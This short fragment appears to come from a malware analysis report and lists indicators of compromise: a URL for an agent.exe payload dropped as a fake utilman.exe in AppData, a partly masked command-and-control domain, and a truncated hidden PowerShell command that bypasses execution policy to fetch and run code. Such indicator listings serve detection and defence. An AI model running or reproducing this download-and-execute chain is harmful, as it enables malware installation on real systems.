Technical Information
- https://cnc.cyberwex.com/agent.exe as %appdata%\\utilman.exe
- 'cn#.##berwex.com':443
- DNS ASK cn#.##berwex.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Ob...